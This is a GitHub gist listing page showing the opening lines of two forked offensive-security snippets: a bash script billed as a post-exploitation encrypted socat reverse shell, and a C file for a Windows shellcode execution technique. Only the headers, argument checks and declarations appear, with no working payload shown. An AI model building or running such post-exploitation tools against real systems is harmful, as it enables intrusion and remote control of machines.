Skip to content

Instantly share code, notes, and snippets.

View opensesamedoors's full-sized avatar

opensesamedoors

View GitHub Profile
@opensesamedoors
opensesamedoors / socat-reverse-shell.sh
Created January 15, 2024 13:29 — forked from shahrilnet/socat-reverse-shell.sh
Post-exploitation reverse shell using socat plus encrypted connection
#!/usr/bin/env bash
# Author : shahril96
# Licensed under the WTFPL license - http://www.wtfpl.net/about/
# Make sure only root can run our script
[[ $EUID -ne 0 ]] && { echo "This script must be run as root" 1>&2; exit 1; }
# print help msg if not enough argument given
[ $# -ne 1 ] && { echo "Usage: `basename $0` port-to-listen"; exit 1; }
@opensesamedoors
opensesamedoors / shellcode_exec_workerfactory.c
Created May 6, 2023 02:18 — forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {